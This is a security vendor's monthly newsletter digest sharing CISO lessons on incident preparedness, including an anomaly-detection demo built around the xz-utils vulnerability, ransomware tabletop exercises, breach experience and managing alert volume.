Rehearse for the worst: CISOs share hard-won lessons on preparedness

Preparing for the worst is an important part of a CISO’s job. From zero-day exploits and insider threats to system failures and compliance violations, many have learned this lesson the hard way through experience on the front lines of incident response. In times of crisis, teams rely on security leaders to guide them through the process of containing the incident and recovering from its impact. In this edition of the Code to Cloud Monthly Digest, we’re sharing strategies and lessons that CISOs use to keep their teams sharp and ready to respond when incidents occur.

Anomaly detection in action: Lessons from the xz-utils vulnerability

When the xz-utils vulnerability (CVE-2024-3094) was disclosed, security teams worldwide raced to patch their systems. But what if attackers had exploited it before it was even disclosed?

This is where anomaly detection truly shines. By identifying and flagging unusual behaviors, it can help spot the exploitation of "not-yet-known" vulnerabilities. In the case of xz-utils, this could have made all the difference. To demonstrate the power of anomaly detection, our Field CISO Andreas Schneider conducted a live-hack of a cloud environment, exploiting the xz-utils vulnerability to escalate privileges and move laterally through the system. He then investigated the associated Lacework Composite Alert to understand the attacker's actions. The simulation highlighted how anomaly detection can recognize deviations from normal operations, even when the specific exploit has not been seen before.?

Watch Andy's full video below to see the live-hack in action or check out the blog for a step-by-step breakdown.?

Ransomware in manufacturing: Why tabletop exercises are a must-have

When it comes to cybersecurity threats in the manufacturing industry, ransomware tops the list for David Ortiz , Global CISO at consumer goods giant Church & Dwight Co., Inc. .

"Everybody is faced with how to defend against ransomware attacks and how to respond when that attack may happen," he said on a recent episode of the Code to Cloud podcast.?

The high-profile Colonial Pipeline incident was a wake-up call for the manufacturing sector, demonstrating just how devastating the impact of a ransomware attack can be.

For David, being prepared is priority number one. He believes that having a comprehensive and well-rehearsed response plan in place is an absolute must-have for manufacturers looking to mitigate the risks posed by ransomware threats.?

“We have a robust cybersecurity incident response plan that focuses on both our corporate and our manufacturing sites,” he said. This plan includes specific playbooks for different scenarios like a ransomware attack.?

But having a plan isn't enough — it needs to be put into practice regularly. “We're drilling all the time,” David said. “We do tabletop exercises. We're out there talking to people, making sure they are aware of our cyber incident response process. We have a really good partnership with everyone within our IT department and our business areas to make sure that everyone understands how we would react and respond to any type of event.”?

Hear more of David’s advice for managing security risks in the manufacturing industry in his episode of Code to Cloud.

From the trenches to the top: The value of breach experience

David isn’t the only CISO who believes that practice makes perfect when it comes to incident response. “When you get into the middle of an incident, you don’t always have time to stop and think,” our Global Field CISO Tim Chase said to IT Brew . That's why he agrees that tabletop exercises are crucial for preparation.

Tim also suggested that having someone on your team who has already spent significant time navigating the complexities of an attack — from containment to legal communication and appropriate disclosure — can be invaluable.

In fact, there's a growing consensus among security professionals that practitioners who have weathered the storm of breaches bring a unique and valuable kind of crisis-management experience to the table.

“I know that it is important to me to have a CISO that has been there, that has done that before,” Tim said.

Read the full article for more CISO perspectives on why it’s important to have battle-hardened security leaders on the team.?

Alert budget: Your key to security team sanity

Ever heard of an “alert budget”? It’s a way to measure how many alerts a security team can realistically handle. It takes into account both the number of alerts and how complex they are to deal with.?

Overwhelming alerts can be a major issue for short-staffed security teams, but by explicitly managing an alert budget, smarter decisions can be made about the types of alerts to take on, the systems to monitor, and the tools to invest in.

To optimize an alert budget, Lacework CISO Lea Kissner suggests focusing on two key areas: better signal and easier alerts:

• Prioritize high-signal, low-noise alerts that provide meaningful insights.
• Make alerts easier to handle by including relevant context, ensuring they are easy to read, and fostering strong relationships between security analysts and system teams.

Proactively managing an alert budget can make or break a team's success and prevent burnout, especially for severely understaffed and under-resourced teams. By getting a handle on alerts, teams can operate at full capacity without losing their minds in the process.

Learn more in Lea's article for Security Magazine .

What would you like to see in the next issue of the Code to Cloud Digest? Let us know in the comments.?